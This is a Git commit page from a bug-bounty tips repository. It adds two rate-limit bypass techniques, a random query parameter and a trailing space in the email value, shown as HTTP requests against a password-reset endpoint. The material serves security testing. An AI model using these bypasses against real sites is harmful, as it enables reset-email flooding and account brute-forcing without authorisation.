ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2025-02-23 15:04:44 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Bypass Rate Limit [2]

Browse Source 
Add 2 tips
This commit is contained in:
Muhammad Daffa 2020-09-19 07:03:32 +07:00 committed by GitHub
parent 753e0e5031
commit da84a9479b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
BypassRateLimit.md
View File

@ -45,3 +45,37 @@ Cookie: aaaaaaaaaaaaa
email=victim@gmail.com email=victim@gmail.com
``` ```
4. Add a random parameter on the last endpoint
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
```
Try this to bypass
```
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
```
5. Add space after the parameter value
```
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com"}
```
Try this to bypass
```
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com "}
```